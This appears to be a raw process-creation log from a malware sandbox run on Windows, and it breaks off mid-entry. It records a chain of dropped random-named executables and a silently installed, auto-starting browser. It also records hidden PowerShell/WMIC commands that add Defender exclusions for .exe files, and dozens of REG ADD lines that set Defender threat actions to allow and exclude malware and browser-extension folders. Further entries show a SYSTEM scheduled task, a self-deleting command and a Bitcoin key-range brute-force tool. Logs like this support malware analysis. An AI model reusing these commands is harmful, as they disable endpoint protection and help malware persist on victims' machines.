"C:\Users\Admin\Pictures\FY89lV0dsIhtziZ3BhtAZzWQ.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=0 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=5680 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20240425144124" --session-guid=d18f1a97-8516-4848-8107-30921ee6597e --server-tracking-blob="YWQyMWRhNDI0YmZhMTlmMjdhOGRhMTljOWNmYWU5OWNhOTY3NTIxNjRlZTI5MzcxMThjZjA3MmQ5MTk0OTk1MDp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2N19fNDU2Iiwic3lzdGVtIjp7InBsYXRmb3JtIjp7ImFyY2giOiJ4ODZfNjQiLCJvcHN5cyI6IldpbmRvd3MiLCJvcHN5cy12ZXJzaW9uIjoiMTEiLCJwYWNrYWdlIjoiRVhFIn19LCJ0aW1lc3RhbXAiOiIxNzE0MDU2MDc4LjEyMzAiLCJ1dG0iOnsiY2FtcGFpZ24iOiI3NjdfXzQ1NiIsIm1lZGl1bSI6ImFwYiIsInNvdXJjZSI6Im1rdCJ9LCJ1dWlkIjoiMGU3YTBiMjUtMmJlYS00NzljLWIwNGEtZmNlOTRjMDdiYWEwIn0= " --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=2804000000000000
C:\Program Files (x86)\GameServerClient\GameService.exe
GameService install GameServerClient "C:\Program Files (x86)\GameServerClient\GameServerClient.exe"
C:\Users\Admin\Pictures\FY89lV0dsIhtziZ3BhtAZzWQ.exe
C:\Users\Admin\Pictures\FY89lV0dsIhtziZ3BhtAZzWQ.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.68 --initial-client-data=0x2bc,0x2c0,0x2c4,0x260,0x2c8,0x6afce1d0,0x6afce1dc,0x6afce1e8
C:\Users\Admin\Pictures\YL5tuQ3LtoLjuC3pq1EPaSbf.exe
"C:\Users\Admin\Pictures\YL5tuQ3LtoLjuC3pq1EPaSbf.exe"
C:\Users\Admin\AppData\Local\Temp\u4q0.2\run.exe
"C:\Users\Admin\AppData\Local\Temp\u4q0.2\run.exe"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
C:\Windows\SysWOW64\cmd.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 5552 -ip 5552
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5552 -s 1096
C:\Users\Admin\AppData\Local\Temp\u4q0.3.exe
"C:\Users\Admin\AppData\Local\Temp\u4q0.3.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 6120 -ip 6120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6120 -s 1536
C:\Program Files (x86)\GameServerClient\GameService.exe
GameService start GameServerClient
C:\Program Files (x86)\GameServerClient\GameService.exe
"C:\Program Files (x86)\GameServerClient\GameService.exe"
C:\Program Files (x86)\GameServerClient\GameServerClient.exe
"C:\Program Files (x86)\GameServerClient\GameServerClient.exe"
C:\Windows\Temp\453435.exe
"C:\Windows\Temp\453435.exe" --list-devices
C:\Users\Admin\Pictures\WTaCK9GXrirZJlizQT8dmwTe.exe
"C:\Users\Admin\Pictures\WTaCK9GXrirZJlizQT8dmwTe.exe"
C:\Users\Admin\AppData\Local\Temp\7zS3FD3.tmp\Install.exe
.\Install.exe /RvdidblCuX "385118" /S
C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
C:\Windows\SysWOW64\cmd.exe
/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameServerClient\installc.bat" "
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\sc.exe
Sc delete GameServerClientC
C:\Program Files (x86)\GameServerClient\GameService.exe
GameService remove GameServerClientC confirm
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bWycNackLSywaqkmgR" /SC once /ST 14:42:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\PVDIpmi.exe\" em /Jzsite_idfcD 385118 /S" /V1 /F
C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Program Files (x86)\GameServerClient\GameService.exe
GameService install GameServerClientC "C:\Program Files (x86)\GameServerClient\GameServerClientC.exe"
C:\Program Files (x86)\GameServerClient\GameService.exe
GameService start GameServerClientC
C:\Program Files (x86)\GameServerClient\GameService.exe
"C:\Program Files (x86)\GameServerClient\GameService.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "RegAsm.exe"
C:\Windows\SysWOW64\choice.exe
choice /C Y /N /D Y /T 3
C:\Program Files (x86)\GameServerClient\GameServerClientC.exe
"C:\Program Files (x86)\GameServerClient\GameServerClientC.exe"
C:\Windows\Temp\605098.exe
"C:\Windows\Temp\605098.exe" --coin BTC -m ADDRESSES -t 0 --range 30ffbf42400000000:30ffbf42440000000 -o xxx0.txt -i C:\Windows\Temp\curjob.bin
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404251441241\assistant\Assistant_109.0.5097.45_Setup.exe_sfx.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404251441241\assistant\Assistant_109.0.5097.45_Setup.exe_sfx.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7ZSfx000.cmd" "
C:\Users\Admin\Pictures\v2Vjv43t4tHT9bkOMLnMdAtW.exe
"C:\Users\Admin\Pictures\v2Vjv43t4tHT9bkOMLnMdAtW.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 5588 -ip 5588
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5588 -s 884
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 5588 -ip 5588
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404251441241\assistant\assistant_installer.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404251441241\assistant\assistant_installer.exe" --version
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5588 -s 960
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404251441241\assistant\assistant_installer.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404251441241\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.45 --initial-client-data=0x234,0x238,0x23c,0x210,0x240,0x896038,0x896044,0x896050
C:\Users\Admin\Pictures\6mfAHiyBc4XM7oPwyt8JYLsj.exe
"C:\Users\Admin\Pictures\6mfAHiyBc4XM7oPwyt8JYLsj.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 5540 -ip 5540
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5540 -s 720
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 380 -p 5540 -ip 5540
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5540 -s 644
C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
"C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\PVDIpmi.exe
C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\PVDIpmi.exe em /Jzsite_idfcD 385118 /S
C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe
C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe
C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ARTXeDTAxvUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ARTXeDTAxvUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ByWuwrOBU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ByWuwrOBU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DUGaRsFaSnqjC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DUGaRsFaSnqjC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RVqmAwyyxwiU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RVqmAwyyxwiU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\wGkeBUkfAIhWvVVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\wGkeBUkfAIhWvVVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\ofqvFcNvzeRditbz\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\ofqvFcNvzeRditbz\" /t REG_DWORD /d 0 /reg:64;"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ARTXeDTAxvUn" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ARTXeDTAxvUn" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ARTXeDTAxvUn" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ByWuwrOBU" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ByWuwrOBU" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DUGaRsFaSnqjC" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DUGaRsFaSnqjC" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RVqmAwyyxwiU2" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RVqmAwyyxwiU2" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
